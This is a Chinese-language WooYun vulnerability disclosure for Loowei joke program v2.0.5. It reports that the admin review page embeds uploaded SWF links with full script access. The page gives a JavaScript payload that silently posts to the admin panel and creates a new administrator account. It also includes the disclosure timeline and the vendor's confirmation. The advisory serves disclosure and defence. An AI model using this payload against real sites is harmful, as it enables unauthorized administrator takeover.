当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-063615

漏洞标题:Loowei笑话程序 v2.0.5 csrf添加管理员

相关厂商:loowei.com

漏洞作者: roker

提交时间:2014-06-09 20:33

修复时间:2014-09-07 20:34

公开时间:2014-09-07 20:34

漏洞类型:CSRF

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-06-09: 细节已通知厂商并且等待厂商处理中
2014-06-09: 厂商已经确认,细节仅向厂商公开
2014-06-12: 细节向第三方安全合作伙伴开放
2014-08-03: 细节向核心白帽子及相关领域专家公开
2014-08-13: 细节向普通白帽子公开
2014-08-23: 细节向实习白帽子公开
2014-09-07: 细节向公众公开

简要描述:

对 swf文件处理不当

详细说明:

对于 输入的代码 都进行了HTML实体转义。
但是,添加视频时发现一个很有趣的现象。
添加一个 外部swf链接

l1.jpg


后台审核时 看源代码。

<embed src="http://www.xxx.com/xss.swf" type="application/x-shockwave-flash" allowfullscreen="true" allownetworking="all" allowscriptaccess="always">


allowfullscreen="true" allownetworking="all" allowscriptaccess="always" ......
为毛?
我们可以 构造一个恶意的 swf文件

l2.jpg


审核触发

l3.jpg


你可能会说 alert有毛用,在同源策略下,是无法接收到 cookie之类的数据的。
然而使用 CORS 的话 我们是可以 ajax post 发送数据的,
代码如下:

var request = false; 
if(window.XMLHttpRequest) {
request = new XMLHttpRequest();
if(request.overrideMimeType) {
request.overrideMimeType('text/xml');
}
}
else if (window.ActiveXObject) {
var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0',
'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
for(var i=0; i<versions.length; i++) {
try {
request = new ActiveXObject(versions);
} catch(e) {}
}
}
xmlhttp=request;
url = "http://xxx.com/admin.php?m=admin&a=modify";
var params ='admin_name=wooyun&admin_pwd=wooyun&admin_realname=11&admin_qq=&admin_phone=&admin_level=1&admin_status=1';
xmlhttp.open("POST", url, true);
xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xmlhttp.setRequestHeader("Content-length", params.length);
xmlhttp.setRequestHeader("Connection", "Keep-Alive");
xmlhttp.setRequestHeader("Accept", "text/html,application/xhtm+xml,application/xml;q=0.9,*/*;q=0.8");
xmlhttp.withCredentials = "true";
xmlhttp.send(params);


测试成功

ll.jpg


漏洞证明:

如上所述

修复方案:

加强安全意识

版权声明:转载请注明来源 roker@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-06-09 21:17

厂商回复:

问题已知,感谢您的帮助。

最新状态:

暂无


漏洞评价:

评论

  1. 2015-05-13 22:35 | Resurrection ( 路人 | Rank:4 漏洞数:1 | 人生总会有一次被原谅的机会,是新生,亦是救...)

    这个思路好流弊